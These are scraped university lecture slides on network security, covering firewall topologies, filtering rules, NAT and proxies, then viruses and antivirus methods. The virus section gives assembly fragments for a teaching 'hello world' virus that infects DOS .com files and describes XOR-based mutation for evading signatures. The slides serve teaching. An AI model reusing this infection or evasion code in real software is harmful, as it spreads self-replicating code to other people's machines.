Upload
victor-barugahare
View
14
Download
4
Embed Size (px)
Citation preview
Security in Information Systems: Lecture Notes in
Network SecurityDue on February 3, 2011
Department of Computer Architecture (DAC)
Universitat Politecnica de Catalunya (UPC)
Jordi Nin
1
Firewalls Viruses PPS
2 - Network Security
Jordi Nin
Department of Computer Architecture (DAC)Universitat Politecnica de Catalunya (UPC)
Security in Information Systems (SSI)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
3 Point to Point Security
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Contents
1 Perimetral Security: FirewallsIntroductionFirewall TopologiesFiltering RulesApplication Level Filtering
2 Viruses, Worms and Trojans
3 Point to Point Security
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Definition
A firewall is a part of a computer system or network designed toblock unauthorized access while permitting authorized commu-nications. It is a device or set of devices that is configured topermit or deny network transmissions based on a set of rulesand other criteria.
When we need a firewall?
↓
Anytime we need to connect a secure network to an insecurenetwork
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Possible Attacks
Regarding Donn B. Parker senior consultant form StanfordResearch Institute:
• Tampering or Data Diddling → false data insertion
• Trojan Horse → a program not acting as expected
• Data leakage → unauthorized data dissemination
• Spoofing → use another computers IP address
• Denial of Service attacks
• ...
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Preliminary Definitions
• Firewall: used to refer to the security policy and securitystrategies
• Firewall system: set of hardware and softwareimplementing a firewall
• Bastion Host: a secure host exposed to an insecurenetwork
• Packet: basic Internet communication unit (datagrama)
• Dual-homed host: a computer with two network interfaces
• Network perimeter or Demilitarized Zone (DMZ): Anetwork added between the insecure network and thesecure network that we need to protect
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Types of Firewall
• Packet filter: Packet filtering inspects each packetpassing through the network and accepts or rejects itbased on user-defined rules
• Circuit-level firewall: Applies security mechanisms whena TCP or UDP connection is established. Once theconnection has been made, packets can flow between thehosts without further checking
• Application gateway: Applies security mechanisms tospecific applications, such as FTP and Telnet servers
• Proxy server: Intercepts all messages entering andleaving the network acting as an intermediary betweenclients and servers. The proxy server hides the truenetwork addresses
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Why not implement security in the hosts?
There are many reasons, as for example...
• administrate the security in many points is more difficultthan in a single one
• hosts executes a large amount of programs, i.e. the riskincreases
• network monitoring becomes easier
• internal network structure is hidden
• ...
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
What can a firewall do?
• It provides a single point of defense, allowing a controlledand audited access to services provided
• It reinforces the own system’s security
• It implements a security policy to access the securenetwork
• It can monitor incoming / outcoming traffic
• It can limit the exposure to an insecure network
• It may become the point to take security decisions sinceall traffic goes across
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
What cannot a firewall do?
• It cannot protect the network against malicious attacksfrom inside of the secure network
• It cannot protect the network against traffic not goingacross it
• It cannot protect the network against the bugs ofauthorized services
• Any application data going across has the potential ofcausing problems (i.e. Trojans)
• If security policy is not deny by default, it cannot protectthe network against new attacks
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Contents
1 Perimetral Security: FirewallsIntroductionFirewall TopologiesFiltering RulesApplication Level Filtering
2 Viruses, Worms and Trojans
3 Point to Point Security
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
A Simple Dual-Homed Firewall
The dual-homed firewall is one of the simplest way to use a firewall. TheInternet comes into the firewall directly via a dial-up modem. You can’thave a DMZ.
Firewall
InternetSwitch or Hub
NetWare Server
Desktop PC
The firewall takes care of passing packets that pass its filtering rulesbetween the internal network and the Internet, and vice versa. The two”homes” refer to the two networks that the firewall is part of - one
interface connected to the outside network, and the other connected tothe inside network
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
A Two-Legged Network with a full exposed DMZThe router (Internet access) is connected to a hub. Servers that wantdirect access to the outside world (unfiltered by the firewall) and one ofthe firewall’s net adapters connect also to this hub. The other firewall’snet adapter connects to the internal hub. PC that need to be protected
are connected to this second hub
Internal Network
Firewall
InternetSwitch or Hub
DMZ Zone
Public Webserver Public Mailserver
Switch or Hub
Desktop PC
Netware Server
Public Network
• Advantages: The firewall needs only two network cards. Thissimplifies the configuration of the firewall
• Drawbacks: DMZ network is totally exposed to the Internet
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Restricted DMZ via Dialup Firewall
To protect the DMZ network one solution is to build a secondrouter/firewall. This is useful if PPP is used. One machine is the exteriorrouter/ firewall (1). It is responsible for creating the PPP connection and
controls the access to the DMZ zone. Firewall 2 is a standarddual-homed host and its job is to protect the internal network
Internal Network 1
Internal Network 2
Firewall 1 ppp dialup
Internet
Switch or Hub
DMZ Zone
Public Webserver Public Mailserver
Switch or Hub
Desktop PC
Netware Server
Firewall 2
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
The Three-legged firewall
We need to add one network card in the firewall for the DMZ
Internal Network 1
Internal Network 2
Firewall
Internet
Switch or Hub
DMZ Zone
Public Webserver Public Mailserver
Switch or Hub
Desktop PC
Netware Server
• Advantages:DMZ IPmasquerade ispossible, only onepublic IP addressis needed
• Drawbacks: oneextra net card →additionalcomplexity
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Contents
1 Perimetral Security: FirewallsIntroductionFirewall TopologiesFiltering RulesApplication Level Filtering
2 Viruses, Worms and Trojans
3 Point to Point Security
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Basic Security policies
• Allow access to a service unless it is explicitly denied• More comfortable for users• Easier to administer• Less secure → it can’t prevent unknown attacks or bugs
• Deny access to a service unless it is explicitly allowed• More secure since it is very difficult to know whichservices are secure and which are not
• More restrictive and less comfortable for users
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Filtering Rules
Filtering rules are a set of rules for filtering/allowing certainnetwork traffic containing a certain port number, protocoltype, ...
Possible filtering criteria
• Origin/destination address (or network)
• Origin/destination port numbers (well-known or private)
• Protocol type (IP/TCP/UDP/ICMP)
• Connection establishment
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Filtering Rule Format
iprule position action [filtering options]
• position: rule order
• action: {PERMIT | DENY}• options:
• −i : input interface• −o: output interface• −p: com. protocol → {IP | TCP | UDP | ICMP}• −s: source IP→{NETID+WILDCARD|HOST+IP|ANY}• −d : dest. IP →{NETID+WILDCARD|HOST+IP|ANY}• −sport: source port → [port number:port number]• −dport: dest. port → [port number:port number]• −state: connection state → {NEW,ESTABLISHED}
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Wildcards
A wildcard mask is a 32 bit mask. It points out the IP addressbits that have to be checked. The 0 mask bits indicate thatthe corresponding IP address bits have to be checked and 1otherwise.
Example
• 145.34.5.6 0.0.0.0 → host 145.34.5.6
• 145.34.5.6 255.255.255.255 → ANY
• 145.34.5.6 0.0.0.255 → 145.34.5.0/24
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Filtering Rules & Net Interfaces
Firewall
Internet Internal Network
eth0 out
eth0 in eth1 out
eth1 in
Example
Internal hosts only access to WWW service and nothing else
• Rule set 1:• iprule 1 permit -p TCP -i eth1 -o eth0 -dport 80• iprule 2 deny -i eth1 -o eth0• iprule 3 permit
• Rule set 2:• iprule 1 permit -p TCP -i eth0 -o eth1 -sport 80• iprule 2 deny -i eth0 -o eth1• iprule 3 permit
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Filtering Rules & Net Interfaces
Firewall
Internet Internal Network
eth0 out
eth0 in eth1 out
eth1 in
Example
Internal hosts only access to WWW service and nothing else
• Rule set 1:• iprule 1 permit -p TCP -i eth1 -o eth0 -dport 80• iprule 2 deny -i eth1 -o eth0• iprule 3 permit
• Rule set 2:• iprule 1 permit -p TCP -i eth0 -o eth1 -sport 80• iprule 2 deny -i eth0 -o eth1• iprule 3 permit
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Rule Order
Rules are only checked until a packet matches!
These two rules sets are completely different:
Rule set 1• iprule 1 deny -p ICMP
• iprule 2 permit -p IP
Rule set 2• iprule 1 permit -p IP
• iprule 2 deny -p ICMP
The first rule set rejects all the ICMP packets while they areaccepted with the second set (IP includes ICMP)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Rule Order
Rules are only checked until a packet matches!
These two rules sets are completely different:
Rule set 1• iprule 1 deny -p ICMP
• iprule 2 permit -p IP
Rule set 2• iprule 1 permit -p IP
• iprule 2 deny -p ICMP
The first rule set rejects all the ICMP packets while they areaccepted with the second set (IP includes ICMP)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Hiding Network Internals
Firewalls hide the structure of internal networks, but how?
↓
NAT (Network Address Translation)
↓
NAT is the process of modifying network address informationin IP packet headers while in transit across a traffic routing
device for the purpose of remapping one IP address space intoanother
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Hiding Network Internals
Firewalls hide the structure of internal networks, but how?
↓
NAT (Network Address Translation)
↓
NAT is the process of modifying network address informationin IP packet headers while in transit across a traffic routing
device for the purpose of remapping one IP address space intoanother
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Types of NAT
NAT is out of the scope of this subject... just a small reminder
Address classification• Inside local address: internal IP address in the internalnetwork
• Inside global address: internal IP address in the Internet
• Outside local address: external IP address in the internalnetwork
• Outside global address: external IP address in the Internet
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Types of NAT
NAT is out of the scope of this subject... just a small reminder
• static NAT: direct mapping between the inside local andglobal addresses. Internal hosts can be accessed from theInternet
Mapping of static addresses:ip nat inside source static local-@ global-@Definition of the internal interface:ip nat inside network-interfaceDefinition of the external interface:ip nat outside network-interface
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Types of NAT
NAT is out of the scope of this subject... just a small reminder
• dynamic NAT: a set of global addresses are dynamicallyassigned. An Internal host has a different IP each time itaccesses to the Internet
Creation of a global address set:ip nat pool name start-@ end-@Access-list to identify the addresses to be translated:access-list id permit network wildcardMapping of dynamic NAT:ip nat inside source list id pool nameDefinition of the internal / external interfaces:ip nat inside network-interfaceip nat outside network-interface
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Types of NAT
NAT is out of the scope of this subject... just a small reminder
• PAT: All internal hosts share the same internal global IP,ports are modified to avoid collisions
Access-list to identify the addresses to be translated:access-list id permit network wildcardMapping of dynamic NAT:ip nat inside source list id interface nameoverloadDefinition of the internal / external interfaces:ip nat inside network-interfaceip nat outside network-interface
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Contents
1 Perimetral Security: FirewallsIntroductionFirewall TopologiesFiltering RulesApplication Level Filtering
2 Viruses, Worms and Trojans
3 Point to Point Security
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Description
a proxy server is a server that acts as an intermediary for requests fromclients seeking resources from other servers
General procedure
1 A client connects to the proxy server, requesting a service (a file orweb page) available from a different server
2 The proxy server evaluates the request according to its filtering rules
3 If the request is validated by the filter, the proxy provides theresource by connecting to the relevant server and requesting theservice on behalf of the client
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Possible Applications
• To keep machines behind it anonymous
• To speed up access to resources (using caching)
• To apply access policy to network services or content, e.g.to block undesired sites
• To log / audit usage
• To scan transmitted content for malware before delivery
• To scan outbound content, e.g. for data leak protection
• To circumvent regional restrictions
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Proxy Types and Functions I
• Caching proxy servers accelerate service requests by retrieving content savedfrom a previous request. They keep local copies of frequently requestedresources
• Web proxy servers serve as a web cache. Most proxy programs provide a wayto deny access to URLs specified in a blacklist (content filtering). Some webproxies also reformat web pages for a specific purpose or audience, such as forcell phones and PDAs
• Anonymous proxy servers attempt to anonymize web traffic
• Open proxy (without access control): the web server receives requestsfrom the anonymizing proxy server, and thus does not receiveinformation about the end user’s address. (note that, the requests arenot anonymous to the anonymizing proxy server)
• Close proxy (with access control): authorized users must log on to gainaccess to the web. The proxy administrator (a company) can therebytrack usage to individuals
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Topologies Rules Proxy
Proxy Types and Functions II
• Intercepting (transparent) proxy servers combine a proxy server with agateway or router (with NAT capabilities). Connections made by client browsersthrough the gateway are diverted to the proxy without client-side configuration(or knowledge). They are commonly used in businesses to prevent avoidance ofacceptable use policy, and to ease administrative burden.
• Reverse proxy is a server installed in the neighborhood of one or more web(application) servers. All traffic coming from the Internet and with adestination to the ’client’ servers goes through the proxy server. There areseveral reasons for installing reverse proxy servers:
• Encryption / SSL acceleration: Different final server clients share thesame ssl key
• Load balancing: connections are distributed among several servers• Security: it is an additional layer of defense and it can protect against
some OS and WebServer specific attacks. However, it does not provideany protection to attacks against the web application or service itself
• Additional services: Data compression, caching of static content
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and TrojansIntroductionViruses Main componentsAntivirus
3 Point to Point Security
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Historical evolution
The word virus has become a generic term describing a numberof different types of attacks on computers using malicious code
↓
1949, Bell Computer labs, 3 junior programmers: create agame called CoreWar. The object of the game is to cause allprocesses of the opposing program(s) to terminate, leaving
your program in sole possession of the machine
↓
Consequence → the computer crashes!
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Economic cost
it is a safe bet that billions of dollars worth of damage havebeen done over the three decades since malicious code hit thebig time (1980)
Why?
• Inactivity time due to the infection
• Cost of the cleaning time
• Cost of the counter measures (Antivirus)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Viruses and Public Health
Why do you take care about malicious code?
• You would not want to become a carrier of some awfuldisease → neither your computer
• but also in using your machine to infect others
↓
A classic example of a virus is the software used to create aDDoS attack
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Difference between Virus and Worm
Virus
A virus is a code fragment that copies itself into a largerprogram, modifying that program and depending on it. A virusexecutes only when its host program begins to run. The virusthen replicates itself, infecting other programs as it reproduces
Worm
A worm is an independent program that reproduces by copyingitself from one computer to another, usually over a network.Unlike a virus, a worm keeps its independence; it usuallydoesn’t modify other programs
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Trojan horses
A Trojan horse is a code fragment that hides inside a programand performs a disguised function
Example
• A Trap door is a mechanism built into a system by itsdesigner. Its function is to give the designer a way tosneak back into the system, circumventing normal systemprotection
• A Masquerade is a generic name for a program thattricks an unsuspecting user into giving away privileges.
• A Spoof is a technique used for misdirection andconcealment (to hide). For instance, a communicationthat the sender wishes to transmit anonymously is taggedwith a false return address
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Malware Categories
Malware Incubation / Hidden Propagation / Payload /Type Latency on Host Replication Attack
Worm Short Not Automatic Fixed
Virus Medium Yes Automatic Fixed
Trojan Long Yes (not) Manual Fixed
Spyware Long(infinite) Yes Automatic (manual) Fixed
Bots Long Yes (not) Automatic Remote Control
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and TrojansIntroductionViruses Main componentsAntivirus
3 Point to Point Security
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Viruses Schema
A virus has two components:
• Replication: The survival of a virus is based in its ability toreproduce
... So how do I make a program reproduce? ...Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them
• Payload: It is usually activated just after the replication step or by
a trigger, such as a date, and it performs a set of bad things like:
• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU
for DES keysearch)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Viruses Schema
A virus has two components:
• Replication: The survival of a virus is based in its ability toreproduce ... So how do I make a program reproduce? ...
Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them
• Payload: It is usually activated just after the replication step or by
a trigger, such as a date, and it performs a set of bad things like:
• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU
for DES keysearch)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Viruses Schema
A virus has two components:
• Replication: The survival of a virus is based in its ability toreproduce ... So how do I make a program reproduce? ...Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them
• Payload: It is usually activated just after the replication step or by
a trigger, such as a date, and it performs a set of bad things like:
• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU
for DES keysearch)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Viruses Schema
A virus has two components:
• Replication: The survival of a virus is based in its ability toreproduce ... So how do I make a program reproduce? ...Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them
• Payload: It is usually activated just after the replication step or by
a trigger, such as a date, and it performs a set of bad things like:
• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU
for DES keysearch)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Viruses Schema
A virus has two components:
• Replication: The survival of a virus is based in its ability toreproduce ... So how do I make a program reproduce? ...Easy, the simplest common viruses infect .com (DOS executables)files. This file format always have code starting at address 0x100,so the virus attaches itself to the end of the file and replace theinstruction at 0x100 with a jump to its start address. Thus, theviral code would execute whenever the file is run; then it looks forother, uninfected, .com files and infect them
• Payload: It is usually activated just after the replication step or by
a trigger, such as a date, and it performs a set of bad things like:
• Make changes to the machines protection state• Make changes to user data (e.g. trash the disk)• Lock the network (e.g. start replicating at maximum speed)• Steal resources for some not allowed tasks (e.g. use the CPU
for DES keysearch)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Viruses Schema
Basic Virus Procedure
1 Search for a file to infect
2 Open the file to see if it is infected
3 If infected, search for another file
4 Else, infect the file
5 If payload execution conditions are met, it is executed
6 Return control to the host program
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Example of a Simple Virus (hello world!) I
com file Virus
Disk Main Memory
com_size code data0 3jump
Virus Assembler Codevcode segment ’code’
org 100h
assume cs:vcode,ds:vcode,es:vcode
start proc far
begin:
push cs push cs ;Store CS twice
pop ds pop es ;Bring ds, es out
call fake proc ;IP in the stack
fake proc proc near
fake proc endp
pop bp ;bp<- proc. addr.
sub bp,107h ;bp at the begining
Virus Assembler Databuffer db 7d dup(0)
length db 2 dup(0)
file inf db ’*.COM’,0
jump db ’e’,0 ;<-jump ascii
start endp ;End of main procedure
codigo ends ;end of code segment
end begining ;END. Go to begining
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Example of a Simple Virus (hello world!) II
1 Search for a file
2 Open the file to see if it is infected
Virus Replication Code;Find the first .com file in the directory
mov ah, 4eh
lea dx, bp+file inf ;DS:DX=offset of file inf
mov cx,000h ;Entry attributes
int 21h
;Open file
mov ah, 3dh ;Open the file operation
mov al, 00000010b ;read/write
mov dx, 009eh ;DX<- DTA(filename) offset
int 21h ;put the handle in AX
push ax ;and store in stack
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Example of a Simple Virus (hello world!) III
4 Else, infect the file
5 If payload execution conditions are met, it is executed
6 Return control to the host program
Virus Infection Code (I);save the initial information of .com file
pop bx push bx ;take the handle from the stack to BX and store it again
mov ah, 3fh ;Read file
mov cx, 0003h ;Read 3 bytes
lea dx, bp+buffer ;and store them in the buffer (data segment)
int 21h
mov ax, 4200h ;move the write pointer to the beginning of the program
mov cx, 0000h mov dx,0000h
int 21h
;Write the first byte (jmp)
mov ah,40h mov cx,1d lea dx,bp+jump
int 21h ;write the first byte of the jump and store DX<- jump offset
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Example of a Simple Virus (hello world!) III
4 Else, infect the file
5 If payload execution conditions are met, it is executed
6 Return control to the host program
Virus Infection Code (II);Calculating file length
mov cx,2 mov si,009ah ;SI <- DTA offset
lea di, bp+ length ;DI <- File length offset
rep movsb ;copy
;Complete the jump instruction
mov ah, 40h mov cx, 2d lea dx,bp+ length
int 21h ;dx<- length offset
;Move pointer to end
mov ax, 4202h ;Move the write pointer to the end of the program
mov cx, 0000h mov dx, 0000h
int 21h
add word ptr [bp+ length],3 ;Restore length
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Example of a Simple Virus (hello world!) III
4 Else, infect the file
5 If payload execution conditions are met, it is executed
6 Return control to the host program
Virus Infection Code (III);Copy the virus to the program
pop bx ;Restore the handle
mov ah, 40h mov cx, length ;number of bytes to copy
lea dx, bp+begining ;Start copying from....
int 21h
printf "hello world!" ;Payload execution
;Copy the buffer containing the first 3 bytes of the file into memory
mov cx, 0003h mov di, 0100h
lea si, bp+buffer rep movsb
mov ax, 0100h ;Address needed to execute the host
jmp ax
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Graphical Description
Step 0 Step 1 (failure)
com file
length
com file
length
virus
jmp
buffe
r
Step 2 (com executes)
com file
length
virus1
jmp
orig
inal
virus2
jmp
v1
Note that, second virus infection is executed first
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and TrojansIntroductionViruses Main componentsAntivirus
3 Point to Point Security
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
General Description
Virus protection software uses two main techniques.
• Signatures, antivirus (AV) solutions have relied stronglyon signature-based scanning, also referred to as scanstring-based technologies. The signature-based scanengine searches within given files for the presence ofcertain strings (often also only in certain regions). Ifthese predefined strings are found, certain actions likealarms can be triggered.
• Periodical analysis, the virus protection program can golooking for trouble. It can scan the various disks andmemories of the computer, detecting and reportingsuspicious code segments, and placing them in quarantine.
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Signature problem!
Signature-based virus protection programs require a constantflow of new signatures in response to evolving attacks.Vendors stay alert for new viruses, determine the signatures,and then make them available as updated virus definitiontables to their users. Usually, users download new signaturesfrom the WWW periodically
Zero Day problem: It occurs when a user finds a new virus beforethe publisher discovers it and can issue an updated signature.
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Signature problem!
Signature-based virus protection programs require a constantflow of new signatures in response to evolving attacks.Vendors stay alert for new viruses, determine the signatures,and then make them available as updated virus definitiontables to their users. Usually, users download new signaturesfrom the WWW periodically
Zero Day problem: It occurs when a user finds a new virus beforethe publisher discovers it and can issue an updated signature.
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Even worse: Mutation!
just as with biological pathogens, viruses can mutate to eludesignature detection
... but how?...They have several options:
• a virus uses a file compression software to change itssignature when it is not active
• a virus changes its own form by introducing extra uselessstatements or adding random numbers
• a virus encrypts itself, only leaving a small headercontaining the code and random key to decrypt
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Even worse: Mutation!
just as with biological pathogens, viruses can mutate to eludesignature detection ... but how?...
They have several options:
• a virus uses a file compression software to change itssignature when it is not active
• a virus changes its own form by introducing extra uselessstatements or adding random numbers
• a virus encrypts itself, only leaving a small headercontaining the code and random key to decrypt
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Even worse: Mutation!
just as with biological pathogens, viruses can mutate to eludesignature detection ... but how?...They have several options:
• a virus uses a file compression software to change itssignature when it is not active
• a virus changes its own form by introducing extra uselessstatements or adding random numbers
• a virus encrypts itself, only leaving a small headercontaining the code and random key to decrypt
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Mutation examples
• a dummy mutation:
• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction
• not so dummy but still simple mutation:• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �
AV Countermeasure: heuristic search methods
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Mutation examples
• a dummy mutation:• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction
• not so dummy but still simple mutation:• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �
AV Countermeasure: heuristic search methods
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Mutation examples
• a dummy mutation:• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction
• not so dummy but still simple mutation:
• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �
AV Countermeasure: heuristic search methods
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Mutation examples
• a dummy mutation:• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction
• not so dummy but still simple mutation:• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �
AV Countermeasure: heuristic search methods
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Mutation examples
• a dummy mutation:• using a NOT gate (inverter), v = NOT (v) → 0010110becomes 1101001, we have to add the code to undo theNOT just as the first virus instruction
• not so dummy but still simple mutation:• generate a random variable and use a XOR gatekey db 1 dup(01101001) and XOR(v , key) → v �
AV Countermeasure: heuristic search methods
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Heuristic Search
Heuristic scanning looks for certain instructions or commandswithin a program that are not found in typical applications. Asa result, a heuristic engine is able to detect potentiallymalicious functionality in new (unexamined) maliciousfunctionality such as the replication mechanism of a virus
Classification of HS methods• weight-based systems rate every functionality that isdetected with a certain weight according to the degree ofdanger it may pose. If the sum of those weights reaches acertain threshold, an alarm is triggered (Quite old system)
• rule-based systems extract certain rules from a file andthis rules are compared against a set of rules for maliciouscode. If there matches a rule, an alarm is triggered
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Heuristic Search
Heuristic scanning looks for certain instructions or commandswithin a program that are not found in typical applications. Asa result, a heuristic engine is able to detect potentiallymalicious functionality in new (unexamined) maliciousfunctionality such as the replication mechanism of a virus
Classification of HS methods• weight-based systems rate every functionality that isdetected with a certain weight according to the degree ofdanger it may pose. If the sum of those weights reaches acertain threshold, an alarm is triggered (Quite old system)
• rule-based systems extract certain rules from a file andthis rules are compared against a set of rules for maliciouscode. If there matches a rule, an alarm is triggered
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Virtual Sandbox
to determine what actions a program performs, most heuristicscanners uses a sandboxed virtual machine
↓
when a user starts a program, the scanner launches it insidethe virtual machine. If no virus-like behavior is observed, theprogram is allowed to start normally; if yes, the user is askedwhether the file is to be cleaned, deleted or quarantined
↓
modern scanners can detect new viruses for without signature
problem: heuristic scanning is computationally intensivereducing computers performance
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Virtual Sandbox
to determine what actions a program performs, most heuristicscanners uses a sandboxed virtual machine
↓
